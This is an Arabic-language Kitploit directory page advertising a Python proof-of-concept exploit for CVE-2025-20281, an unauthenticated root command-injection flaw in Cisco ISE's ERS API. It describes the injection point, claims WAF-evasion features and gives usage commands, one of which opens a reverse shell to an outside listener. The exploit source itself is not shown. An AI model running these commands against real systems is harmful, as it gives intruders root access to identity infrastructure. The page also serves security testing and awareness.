Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Cisco-CVE-2025-20281-illdeed — استغلال تنفيذ تعليمات برمجية عن بُعد دون مصادقة لـ CVE-2025-20281 في واجهة برمجة تطبيقات ERS التابعة لـ Cisco ISE. تنفيذ أوامر أو إطلاق قذائف عكسية كجذر — دون الحاجة إلى مصادقة. | Kitploit
أدوات/GitHubGitHub/ill-deed/cisco-cve-2025-20281-illdeed
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubill-deed/cisco-cve-2025-20281-illdeed

Cisco-CVE-2025-20281-illdeed

استغلال تنفيذ تعليمات برمجية عن بُعد دون مصادقة لـ CVE-2025-20281 في واجهة برمجة تطبيقات ERS التابعة لـ Cisco ISE. تنفيذ أوامر أو إطلاق قذائف عكسية كجذر — دون الحاجة إلى مصادقة.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
52منذ سنة واحدةلم تتم المراجعة بعد

CVE-2025-20281 — استغلال RCE غير مصادق عليه في واجهة ERS API لـ Cisco ISE

يحتوي هذا المستودع على استغلال إثبات المفهوم بلغة Python 3 لـ CVE-2025-20281، وهي ثغرة أمنية حرجة في Cisco Identity Services Engine (ISE) تسمح بتنفيذ تعليمات برمجية عن بُعد غير مصادق عليه (RCE) كجذر عبر واجهة ERS API.


🩻 نظرة عامة على الثغرة

يفشل نقطة النهاية /ers/sdk#_ في واجهة ERS الخاصة بـ Cisco ISE في التحقق من المصادقة عند معالجة طلبات إنشاء المستخدم.
عن طريق حقن أوامر shell في معامل name لكائن InternalUser، يمكن للمهاجمين تحقيق تنفيذ الأوامر كجذر.

  • معرف CVE: CVE-2025-20281
  • المتأثر: عقدة إدارة السياسات (PAN) في Cisco ISE مع تمكين ERS
  • الخطورة: حرجة (CVSS 9.8)
  • المصادقة: لا يلزم أي مصادقة

⚙️ الميزات

  • ✅ تشغيل أوامر عشوائية (--cmd)
  • ✅ اختبار سريع باستخدام --whoami
  • ✅ إطلاق قذائف عكسية (--reverse)
  • ✅ لا حاجة لمصادقة أو رمز جلسة
  • ✅ إخفاء تحذيرات SSL ومخرجات نظيفة
  • ✅ رؤوس مشروعة لتجاوز جدران الحماية البسيطة (WAFs)

🚀 الاستخدام

root@kitploit:~
python3 CVE-2025-20281.py TARGET [--whoami | --cmd "id" | --reverse LHOST LPORT]

أمثلة

اختبار الأمر:

root@kitploit:~
python3 CVE-2025-20281.py 192.168.1.10 --whoami

تشغيل أمر مخصص:

root@kitploit:~
python3 CVE-2025-20281.py 192.168.1.10 --cmd "id && hostname"

قذيفة عكسية:

root@kitploit:~
python3 CVE-2025-20281.py 192.168.1.10 --reverse 10.10.14.99 4444

⚠️ إخلاء مسؤولية قانوني

هذا الكود مُقدم لأغراض تعليمية واختبارية مرخصة فقط. لا تستخدم هذا البرنامج ضد شبكات أو أنظمة لا تملكها أو ليس لديك إذن لاختبارها.


🙏 الإسناد

الثغرة: تم الكشف عنها عبر تنبيه Cisco

إعادة هيكلة الإثبات: illdeed

تنزيل الأداة